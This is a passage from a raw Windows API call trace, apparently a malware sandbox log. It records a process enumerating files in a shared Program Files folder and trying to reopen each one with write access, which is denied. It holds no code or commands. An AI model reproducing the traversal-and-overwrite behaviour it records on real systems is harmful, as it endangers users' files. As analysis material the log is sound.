lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0083.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.932] AreFileApisANSI () returned 1 [0083.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml", lpUsedDefaultChar=0x0) returned 79 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0083.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.932] AreFileApisANSI () returned 1 [0083.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0083.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0083.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 79 [0083.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.933] GetFileType (hFile=0x42c) returned 0x1 [0083.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.933] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.933] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.933] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.933] CloseHandle (hObject=0x42c) returned 1 [0083.934] AreFileApisANSI () returned 1 [0083.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0083.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0083.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 79 [0083.934] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.934] GetLastError () returned 0x5 [0083.934] GetLastError () returned 0x5 [0083.934] SetLastError (dwErrCode=0x5) [0083.934] GetLastError () returned 0x5 [0083.934] SetLastError (dwErrCode=0x5) [0083.934] GetLastError () returned 0x5 [0083.934] SetLastError (dwErrCode=0x5) [0083.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0083.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.934] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cef41, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oskpred", cAlternateFileName="")) returned 1 [0083.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0083.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0083.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.935] AreFileApisANSI () returned 1 [0083.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred", lpUsedDefaultChar=0x0) returned 73 [0083.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0083.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0083.935] AreFileApisANSI () returned 1 [0083.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0083.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred") returned 73 [0083.935] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.935] GetLastError () returned 0x5 [0083.935] GetLastError () returned 0x5 [0083.935] SetLastError (dwErrCode=0x5) [0083.935] GetLastError () returned 0x5 [0083.935] SetLastError (dwErrCode=0x5) [0083.935] GetLastError () returned 0x5 [0083.936] SetLastError (dwErrCode=0x5) [0083.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0083.936] AreFileApisANSI () returned 1 [0083.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0083.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred") returned 73 [0083.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.936] GetLastError () returned 0x5 [0083.936] GetLastError () returned 0x5 [0083.936] SetLastError (dwErrCode=0x5) [0083.936] GetLastError () returned 0x5 [0083.936] SetLastError (dwErrCode=0x5) [0083.936] GetLastError () returned 0x5 [0083.936] SetLastError (dwErrCode=0x5) [0083.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0083.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0083.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0083.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0083.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.937] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0083.937] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78710 [0083.937] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cef41, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.937] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 1 [0083.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0083.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0083.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x80a30 [0083.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x51398 [0083.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0083.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.938] AreFileApisANSI () returned 1 [0083.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpUsedDefaultChar=0x0) returned 89 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0083.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0083.938] AreFileApisANSI () returned 1 [0083.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0083.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x51398 [0083.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 89 [0083.939] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0083.939] GetFileType (hFile=0x428) returned 0x1 [0083.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.939] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.939] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.939] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.939] CloseHandle (hObject=0x428) returned 1 [0083.940] AreFileApisANSI () returned 1 [0083.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0083.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x51398 [0083.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 89 [0083.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.940] GetLastError () returned 0x5 [0083.940] GetLastError () returned 0x5 [0083.940] SetLastError (dwErrCode=0x5) [0083.940] GetLastError () returned 0x5 [0083.940] SetLastError (dwErrCode=0x5) [0083.940] GetLastError () returned 0x5 [0083.940] SetLastError (dwErrCode=0x5) [0083.940] HeapFree (in: hHeap=0x20000, 